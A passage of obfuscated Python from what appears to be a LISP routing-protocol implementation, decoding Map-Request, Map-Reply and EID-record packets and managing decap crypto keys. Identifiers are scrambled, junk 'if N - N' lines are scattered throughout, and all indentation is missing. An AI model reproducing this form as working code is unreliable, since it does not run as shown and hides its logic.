self . auth_bit = True if ( iII & 0x08000000 ) else False
self . map_data_present = True if ( iII & 0x04000000 ) else False
self . rloc_probe = True if ( iII & 0x02000000 ) else False
self . smr_bit = True if ( iII & 0x01000000 ) else False
self . pitr_bit = True if ( iII & 0x00800000 ) else False
self . smr_invoked_bit = True if ( iII & 0x00400000 ) else False
self . mobile_node = True if ( iII & 0x00200000 ) else False
self . xtr_id_present = True if ( iII & 0x00100000 ) else False
self . local_xtr = True if ( iII & 0x00004000 ) else False
self . dont_reply_bit = True if ( iII & 0x00002000 ) else False
self . itr_rloc_count = ( ( iII >> 8 ) & 0x1f )
self . record_count = iII & 0xff
self . nonce = Iii11I [ 0 ]
if 77 - 77: OOooOOo % oO0o + iIii1I11I1II1 * Ii1I . IiII . Oo0Ooo
if 29 - 29: I1ii11iIi11i + OoooooooOO . OoO0O00 . i1IIi - OoooooooOO * i11iIiiIii
if 19 - 19: I1ii11iIi11i * O0 - ooOoO0o
if 27 - 27: iII111i / o0oOOo0O0Ooo . OoOoOO00 * Ii1I * I1Ii111
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
if 81 - 81: I1Ii111
if 45 - 45: OOooOOo * II111iiii * OoooooooOO / OoooooooOO * I1Ii111
Iiiii = struct . calcsize ( "H" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 38 - 38: iII111i . OoooooooOO
O0ooo0 = struct . unpack ( "H" , packet [ : Iiiii ] )
self . source_eid . afi = socket . ntohs ( O0ooo0 [ 0 ] )
packet = packet [ Iiiii : : ]
if 28 - 28: I1Ii111 * i1IIi . I1ii11iIi11i
if ( self . source_eid . afi == LISP_AFI_LCAF ) :
Oo0OO = packet
packet = self . source_eid . lcaf_decode_iid ( packet )
if ( packet == None ) :
packet = self . lcaf_decode_json ( Oo0OO )
if ( packet == None ) : return ( None )
if 99 - 99: i1IIi % oO0o
elif ( self . source_eid . afi != LISP_AFI_NONE ) :
packet = self . source_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 13 - 13: OoOoOO00 * O0 - iIii1I11I1II1 * I1IiiI + i11iIiiIii
self . source_eid . mask_len = self . source_eid . host_mask_len ( )
if 98 - 98: iIii1I11I1II1 + OoO0O00 + I1IiiI + OoooooooOO
O0Oo0 = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
self . itr_rlocs = [ ]
oOOoo0000o = self . itr_rloc_count + 1
if 5 - 5: I11i
while ( oOOoo0000o != 0 ) :
Iiiii = struct . calcsize ( "H" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 11 - 11: I1ii11iIi11i * Ii1I . Ii1I * IiII * i11iIiiIii / II111iiii
O0ooo0 = socket . ntohs ( struct . unpack ( "H" , packet [ : Iiiii ] ) [ 0 ] )
I11iiII1I1111 = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
I11iiII1I1111 . afi = O0ooo0
if 58 - 58: i1IIi
if 90 - 90: i1IIi / OoooooooOO . Oo0Ooo
if 5 - 5: iII111i * ooOoO0o + IiII . I1IiiI / I1IiiI
if 72 - 72: OoO0O00 / I1ii11iIi11i - OOooOOo - OoooooooOO / OoooooooOO % OoooooooOO
if 85 - 85: OoO0O00 . o0oOOo0O0Ooo . I1IiiI
if ( I11iiII1I1111 . afi == LISP_AFI_LCAF ) :
OoO = packet
Oo000o0o0 = packet [ Iiiii : : ]
packet = self . lcaf_decode_json ( Oo000o0o0 )
if ( packet == Oo000o0o0 ) : packet = OoO
if 76 - 76: oO0o * ooOoO0o - iIii1I11I1II1
if 25 - 25: OoOoOO00 / Oo0Ooo / OoooooooOO
if 91 - 91: IiII - I1ii11iIi11i - I1Ii111
if 35 - 35: iIii1I11I1II1 . O0 + OoOoOO00 / OoO0O00 / IiII * II111iiii
if 32 - 32: I1Ii111 - iIii1I11I1II1 / I11i * OoO0O00 * OoO0O00
if 77 - 77: I1ii11iIi11i
if ( I11iiII1I1111 . afi != LISP_AFI_LCAF ) :
if ( len ( packet ) < I11iiII1I1111 . addr_length ( ) ) : return ( None )
packet = I11iiII1I1111 . unpack_address ( packet [ Iiiii : : ] )
if ( packet == None ) : return ( None )
if 16 - 16: II111iiii - II111iiii * I11i / OOooOOo . IiII
if ( O0Oo0 ) :
self . itr_rlocs . append ( I11iiII1I1111 )
oOOoo0000o -= 1
continue
if 36 - 36: I11i / iIii1I11I1II1
if 59 - 59: i1IIi
oo0o00OO = lisp_build_crypto_decap_lookup_key ( I11iiII1I1111 , port )
if 85 - 85: I1Ii111 + iIii1I11I1II1 + ooOoO0o + Oo0Ooo
if 75 - 75: O0 . I11i - Ii1I / I1Ii111 / I1ii11iIi11i % I11i
if 97 - 97: OoOoOO00 - OoO0O00
if 64 - 64: i1IIi / OoooooooOO / I1ii11iIi11i - Oo0Ooo + oO0o
if 6 - 6: OOooOOo % II111iiii * IiII
if ( lisp_nat_traversal and I11iiII1I1111 . is_private_address ( ) and source ) : I11iiII1I1111 = source
if 34 - 34: I11i % iII111i - ooOoO0o - I1IiiI
I1ioOo = lisp_crypto_keys_by_rloc_decap
if ( I1ioOo . has_key ( oo0o00OO ) ) : I1ioOo . pop ( oo0o00OO )
if 31 - 31: IiII % I11i
if 9 - 9: OoooooooOO / Oo0Ooo / o0oOOo0O0Ooo % Oo0Ooo
if 80 - 80: Ii1I + OoO0O00 * OoooooooOO - IiII % O0 - I1Ii111
if 80 - 80: II111iiii / I1ii11iIi11i
if 60 - 60: OOooOOo - iII111i + iIii1I11I1II1 + II111iiii + iII111i
if 35 - 35: Oo0Ooo * O0 / oO0o * i1IIi . I11i . O0
lisp_write_ipc_decap_key ( oo0o00OO , None )
if 22 - 22: oO0o / II111iiii . OoOoOO00
elif ( self . json_telemetry == None ) :
if 9 - 9: i11iIiiIii + ooOoO0o . iIii1I11I1II1 * OoOoOO00
if 4 - 4: I1Ii111 + iII111i % O0
if 98 - 98: i1IIi + I1Ii111 - I1ii11iIi11i . OoooooooOO / O0 / iII111i
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
OoO = packet
iI1IiI1 = lisp_keys ( 1 )
packet = iI1IiI1 . decode_lcaf ( OoO , 0 )
if 53 - 53: I1Ii111 + IiII . i1IIi
if ( packet == None ) : return ( None )
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
iI111I = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
LISP_CS_25519_CHACHA ]
if ( iI1IiI1 . cipher_suite in iI111I ) :
if ( iI1IiI1 . cipher_suite == LISP_CS_25519_CBC or
iI1IiI1 . cipher_suite == LISP_CS_25519_GCM ) :
Oo000O000 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 39 - 39: ooOoO0o - OoooooooOO
if ( iI1IiI1 . cipher_suite == LISP_CS_25519_CHACHA ) :
Oo000O000 = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
else :
Oo000O000 = lisp_keys ( 1 , do_poly = False , do_curve = False ,
do_chacha = False )
if 74 - 74: ooOoO0o - i11iIiiIii
packet = Oo000O000 . decode_lcaf ( OoO , 0 )
if ( packet == None ) : return ( None )
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
if ( len ( packet ) < Iiiii ) : return ( None )
O0ooo0 = struct . unpack ( "H" , packet [ : Iiiii ] ) [ 0 ]
I11iiII1I1111 . afi = socket . ntohs ( O0ooo0 )
if ( len ( packet ) < I11iiII1I1111 . addr_length ( ) ) : return ( None )
if 33 - 33: Ii1I . i1IIi - II111iiii - OoO0O00
packet = I11iiII1I1111 . unpack_address ( packet [ Iiiii : : ] )
if ( packet == None ) : return ( None )
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if ( O0Oo0 ) :
self . itr_rlocs . append ( I11iiII1I1111 )
oOOoo0000o -= 1
continue
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
oo0o00OO = lisp_build_crypto_decap_lookup_key ( I11iiII1I1111 , port )
if 52 - 52: O0 . I1Ii111 + iII111i / i11iIiiIii
oO0OooO0o0 = None
if ( lisp_nat_traversal and I11iiII1I1111 . is_private_address ( ) and source ) : I11iiII1I1111 = source
if 23 - 23: OoO0O00 / o0oOOo0O0Ooo
if 22 - 22: OOooOOo - OoO0O00 . I11i
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) :
iIi11III = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ]
oO0OooO0o0 = iIi11III [ 1 ] if iIi11III and iIi11III [ 1 ] else None
if 89 - 89: I1Ii111
if 19 - 19: IiII + I1Ii111
O0OOOo000 = True
if ( oO0OooO0o0 ) :
if ( oO0OooO0o0 . compare_keys ( Oo000O000 ) ) :
self . keys = [ None , oO0OooO0o0 , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 5 - 5: OoO0O00 / iII111i / OOooOOo
else :
O0OOOo000 = False
OOO0o0oo = bold ( "Remote decap-rekeying" , False )
lprint ( "{} for RLOC {}" . format ( OOO0o0oo , red ( oo0o00OO ,
False ) ) )
Oo000O000 . copy_keypair ( oO0OooO0o0 )
Oo000O000 . uptime = oO0OooO0o0 . uptime
oO0OooO0o0 = None
if 68 - 68: iII111i . OOooOOo
if 6 - 6: Ii1I - o0oOOo0O0Ooo % I11i + i11iIiiIii
if 40 - 40: O0 . Ii1I
if ( oO0OooO0o0 == None ) :
self . keys = [ None , Oo000O000 , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
Oo000O000 . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( oo0o00OO , False ) ) )
elif ( Oo000O000 . remote_public_key != None ) :
if ( O0OOOo000 ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# IiII * OoooooooOO . I1ii11iIi11i % Ii1I
red ( oo0o00OO , False ) ) )
if 51 - 51: I1ii11iIi11i % OoooooooOO - OoooooooOO . I11i
Oo000O000 . compute_shared_key ( "decap" )
Oo000O000 . add_key_by_rloc ( oo0o00OO , False )
if 97 - 97: i1IIi % I11i . o0oOOo0O0Ooo * I1IiiI % II111iiii
if 41 - 41: I11i . I1ii11iIi11i
if 69 - 69: O0 * ooOoO0o % ooOoO0o / oO0o
if 2 - 2: oO0o % OoO0O00
self . itr_rlocs . append ( I11iiII1I1111 )
oOOoo0000o -= 1
if 3 - 3: oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
Iiiii = struct . calcsize ( "BBH" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
IIIiIiIIII1i1 , OO00O , O0ooo0 = struct . unpack ( "BBH" , packet [ : Iiiii ] )
self . subscribe_bit = ( IIIiIiIIII1i1 & 0x80 )
self . target_eid . afi = socket . ntohs ( O0ooo0 )
packet = packet [ Iiiii : : ]
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
self . target_eid . mask_len = OO00O
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , O0Ooo00oo = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( O0Ooo00oo ) : self . target_group = O0Ooo00oo
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ Iiiii : : ]
if 60 - 60: oO0o
return ( packet )
if 5 - 5: o0oOOo0O0Ooo / o0oOOo0O0Ooo - ooOoO0o * OoooooooOO . OoooooooOO . I1Ii111
if 56 - 56: iII111i % I1IiiI * OOooOOo * i11iIiiIii
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 15 - 15: I1IiiI - oO0o - II111iiii + O0
if 54 - 54: iIii1I11I1II1 - IiII - IiII
def encode_xtr_id ( self , packet ) :
oo0 = self . xtr_id >> 64
i11Iiiiii11II = self . xtr_id & 0xffffffffffffffff
oo0 = byte_swap_64 ( oo0 )
i11Iiiiii11II = byte_swap_64 ( i11Iiiiii11II )
packet += struct . pack ( "QQ" , oo0 , i11Iiiiii11II )
return ( packet )
if 18 - 18: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii
if 63 - 63: iII111i - OoO0O00 * OOooOOo
def decode_xtr_id ( self , packet ) :
Iiiii = struct . calcsize ( "QQ" )
if ( len ( packet ) < Iiiii ) : return ( None )
packet = packet [ len ( packet ) - Iiiii : : ]
oo0 , i11Iiiiii11II = struct . unpack ( "QQ" , packet [ : Iiiii ] )
oo0 = byte_swap_64 ( oo0 )
i11Iiiiii11II = byte_swap_64 ( i11Iiiiii11II )
self . xtr_id = ( oo0 << 64 ) | i11Iiiiii11II
return ( True )
if 89 - 89: iII111i / Oo0Ooo
if 66 - 66: o0oOOo0O0Ooo + OoOoOO00 % OoooooooOO . I11i
if 30 - 30: II111iiii - Oo0Ooo - i11iIiiIii + O0
if 93 - 93: i1IIi + I1Ii111 / OoO0O00 - I11i % Oo0Ooo / Ii1I
if 1 - 1: Oo0Ooo / Ii1I . i11iIiiIii % OOooOOo + o0oOOo0O0Ooo + O0
if 54 - 54: I1Ii111 + ooOoO0o % IiII
if 83 - 83: o0oOOo0O0Ooo * iIii1I11I1II1
if 36 - 36: OoOoOO00 + II111iiii - OoO0O00 % ooOoO0o * i1IIi
if 4 - 4: Ii1I + OoO0O00 * I1ii11iIi11i
if 13 - 13: OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
if 46 - 46: OoO0O00 * I1IiiI
if 25 - 25: I1Ii111 . IiII % O0 % i1IIi
if 53 - 53: O0 % ooOoO0o
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
if 22 - 22: i1IIi
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
if 88 - 88: OOooOOo
if 25 - 25: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o - Ii1I . oO0o * Ii1I
if 85 - 85: i1IIi
if 94 - 94: OoooooooOO . O0 / OoooooooOO
if 67 - 67: i11iIiiIii + OoOoOO00
if 50 - 50: ooOoO0o . i1IIi + I1ii11iIi11i . OOooOOo
if 97 - 97: I1IiiI
if 63 - 63: O0 - OoOoOO00 / i11iIiiIii / OoooooooOO / ooOoO0o / II111iiii
class lisp_map_reply ( ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
if 45 - 45: II111iiii . OoO0O00 + OoO0O00 * iIii1I11I1II1
if 23 - 23: IiII * OoOoOO00 % Ii1I / Ii1I - ooOoO0o - OOooOOo
def print_map_reply ( self ) :
oOOo0ooO0 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
if 86 - 86: OOooOOo . OoooooooOO * I1IiiI - Oo0Ooo / i11iIiiIii * iII111i
lprint ( oOOo0ooO0 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
# i11iIiiIii + I11i + iII111i % I1IiiI
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
if 84 - 84: oO0o % OOooOOo
if 25 - 25: i11iIiiIii * OoOoOO00 + i11iIiiIii . i1IIi
def encode ( self ) :
iII = ( LISP_MAP_REPLY << 28 ) | self . record_count
iII |= self . hop_count << 8
if ( self . rloc_probe ) : iII |= 0x08000000
if ( self . echo_nonce_capable ) : iII |= 0x04000000
if ( self . security ) : iII |= 0x02000000
if 83 - 83: I1IiiI
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( iII ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
return ( IiiiIi1iiii11 )
if 90 - 90: II111iiii
if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
def decode ( self , packet ) :
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
iII = iII [ 0 ]
packet = packet [ Iiiii : : ]
if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
i1I1iii1I11II = "Q"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 71 - 71: i1IIi / I11i
Iii11I = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
packet = packet [ Iiiii : : ]
if 14 - 14: OoooooooOO
iII = socket . ntohl ( iII )
self . rloc_probe = True if ( iII & 0x08000000 ) else False
self . echo_nonce_capable = True if ( iII & 0x04000000 ) else False
self . security = True if ( iII & 0x02000000 ) else False
self . hop_count = ( iII >> 8 ) & 0xff
self . record_count = iII & 0xff
self . nonce = Iii11I [ 0 ]
if 99 - 99: o0oOOo0O0Ooo * o0oOOo0O0Ooo
if ( lisp_crypto_keys_by_nonce . has_key ( self . nonce ) ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
if 6 - 6: i11iIiiIii + oO0o % ooOoO0o + i11iIiiIii - OOooOOo
return ( packet )
if 12 - 12: iII111i . oO0o % IiII * OoooooooOO . IiII
if 15 - 15: I1IiiI . I1IiiI / i11iIiiIii
if 17 - 17: iIii1I11I1II1 / OoO0O00 - II111iiii
if 46 - 46: iIii1I11I1II1 * oO0o / i11iIiiIii + II111iiii + I11i
if 30 - 30: O0 * IiII - I1Ii111 % O0 * Ii1I
if 29 - 29: I1ii11iIi11i % I1ii11iIi11i % Ii1I + ooOoO0o % iIii1I11I1II1
if 41 - 41: I1ii11iIi11i % I1Ii111
if 37 - 37: Oo0Ooo . I1IiiI % OoOoOO00 . OoO0O00 - Oo0Ooo / OoO0O00
if 34 - 34: i11iIiiIii + OoO0O00 + i11iIiiIii . IiII % O0
if 64 - 64: o0oOOo0O0Ooo . iIii1I11I1II1
if 86 - 86: ooOoO0o - I11i . iIii1I11I1II1 - iIii1I11I1II1
if 61 - 61: Ii1I % Oo0Ooo + OoOoOO00
if 60 - 60: oO0o . OoooooooOO
if 40 - 40: I11i
if 44 - 44: ooOoO0o
if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
if 97 - 97: I1IiiI / o0oOOo0O0Ooo
if 13 - 13: I1ii11iIi11i
if 72 - 72: Oo0Ooo + IiII / Ii1I * Oo0Ooo
if 41 - 41: OOooOOo - OoOoOO00 . I1IiiI + i11iIiiIii + OoO0O00 * iII111i
if 85 - 85: OoO0O00 + II111iiii
if 87 - 87: OoO0O00
if 93 - 93: OoooooooOO
if 80 - 80: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii / OOooOOo + oO0o
if 10 - 10: OoO0O00 . OoO0O00 + O0
if 13 - 13: i1IIi . I1IiiI
if 45 - 45: ooOoO0o % I11i
if 37 - 37: iII111i
if 70 - 70: O0 + iIii1I11I1II1 % O0 * o0oOOo0O0Ooo - Oo0Ooo - ooOoO0o
if 94 - 94: i1IIi + IiII / OoooooooOO - oO0o / OOooOOo / OoOoOO00
if 55 - 55: OOooOOo
class lisp_eid_record ( ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . record_ttl = 0
if 5 - 5: I11i / OoOoOO00
if 48 - 48: i1IIi - oO0o . OoooooooOO - OoO0O00 - i1IIi
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
if 19 - 19: oO0o % Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
return ( green ( self . eid . print_sg ( self . group ) , False ) )
if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
def print_ttl ( self ) :
oOoooOOO0o0 = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
oOoooOOO0o0 = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( oOoooOOO0o0 % 60 ) == 0 ) :
oOoooOOO0o0 = str ( oOoooOOO0o0 / 60 ) + " hours"
else :
oOoooOOO0o0 = str ( oOoooOOO0o0 ) + " mins"
if 34 - 34: iII111i . OOooOOo
return ( oOoooOOO0o0 )
if 13 - 13: OoO0O00 * OOooOOo + oO0o
if 21 - 21: i11iIiiIii . Ii1I % i1IIi * Ii1I . oO0o + Ii1I
def store_ttl ( self ) :
oOoooOOO0o0 = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : oOoooOOO0o0 = self . record_ttl & 0x7fffffff
return ( oOoooOOO0o0 )
if 92 - 92: i1IIi + OoO0O00 * I11i
if 70 - 70: Oo0Ooo
def print_record ( self , indent , ddt ) :
O0II = ""
IIiI = ""
I1ii1i11I = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
I1ii1i11I = lisp_map_referral_action_string [ self . action ]
I1ii1i11I = bold ( I1ii1i11I , False )
O0II = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
if 76 - 76: OoO0O00 + I1Ii111 + OoO0O00 * OoooooooOO
IIiI = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
if 85 - 85: iII111i + OOooOOo
if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
I1ii1i11I = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
I1ii1i11I = bold ( I1ii1i11I , False )
if 53 - 53: Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
O0ooo0 = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
oOOo0ooO0 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
lprint ( oOOo0ooO0 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
I1ii1i11I , "auth" if ( self . authoritative is True ) else "non-auth" ,
O0II , IIiI , self . map_version , O0ooo0 ,
green ( self . print_prefix ( ) , False ) ) )
if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
if 60 - 60: I1Ii111 * iII111i / OoooooooOO * Oo0Ooo
def encode ( self ) :
I11I1iI = self . action << 13
if ( self . authoritative ) : I11I1iI |= 0x1000
if ( self . ddt_incomplete ) : I11I1iI |= 0x800
if 65 - 65: OOooOOo . II111iiii * i11iIiiIii + OOooOOo
if 99 - 99: I1ii11iIi11i % Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
O0ooo0 = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( O0ooo0 < 0 ) : O0ooo0 = LISP_AFI_LCAF
oOOooo000OoO = ( self . group . is_null ( ) == False )
if ( oOOooo000OoO ) : O0ooo0 = LISP_AFI_LCAF
if 93 - 93: Ii1I / OoOoOO00 + ooOoO0o . OoO0O00 / O0 . o0oOOo0O0Ooo
IIi1II = ( self . signature_count << 12 ) | self . map_version
OO00O = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
if 36 - 36: IiII . IiII
IiiiIi1iiii11 = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , OO00O , socket . htons ( I11I1iI ) ,
socket . htons ( IIi1II ) , socket . htons ( O0ooo0 ) )
if 27 - 27: OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if ( oOOooo000OoO ) :
IiiiIi1iiii11 += self . eid . lcaf_encode_sg ( self . group )
return ( IiiiIi1iiii11 )
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
if 27 - 27: II111iiii + i11iIiiIii
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
IiiiIi1iiii11 = IiiiIi1iiii11 [ 0 : - 2 ]
IiiiIi1iiii11 += self . eid . address . encode_geo ( )
return ( IiiiIi1iiii11 )
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
if 66 - 66: oO0o / OOooOOo / iII111i
if 5 - 5: I1Ii111 . oO0o
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
if ( O0ooo0 == LISP_AFI_LCAF ) :
IiiiIi1iiii11 += self . eid . lcaf_encode_iid ( )
return ( IiiiIi1iiii11 )
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
IiiiIi1iiii11 += self . eid . pack_address ( )
return ( IiiiIi1iiii11 )
if 65 - 65: ooOoO0o + IiII - OoOoOO00 % II111iiii - iIii1I11I1II1
if 39 - 39: I1IiiI + I1ii11iIi11i - i11iIiiIii
def decode ( self , packet ) :
i1I1iii1I11II = "IBBHHH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 43 - 43: iIii1I11I1II1
self . record_ttl , self . rloc_count , self . eid . mask_len , I11I1iI , self . map_version , self . eid . afi = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
if 63 - 63: I1ii11iIi11i % ooOoO0o % I1ii11iIi11i
self . record_ttl = socket . ntohl ( self . record_ttl )
I11I1iI = socket . ntohs ( I11I1iI )
self . action = ( I11I1iI >> 13 ) & 0x7
self . authoritative = True if ( ( I11I1iI >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( I11I1iI >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ Iiiii : : ]
if 71 - 71: Ii1I
if 43 - 43: o0oOOo0O0Ooo / ooOoO0o
if 88 - 88: i11iIiiIii - i1IIi + Oo0Ooo - O0
if 50 - 50: I1ii11iIi11i
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , IIi1iiIII11 = self . eid . lcaf_decode_eid ( packet )
if ( IIi1iiIII11 ) : self . group = IIi1iiIII11
self . group . instance_id = self . eid . instance_id
return ( packet )
if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
packet = self . eid . unpack_address ( packet )
return ( packet )
if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 61 - 61: I11i / OOooOOo
if 85 - 85: OoOoOO00 - I11i . OoOoOO00 . OoOoOO00
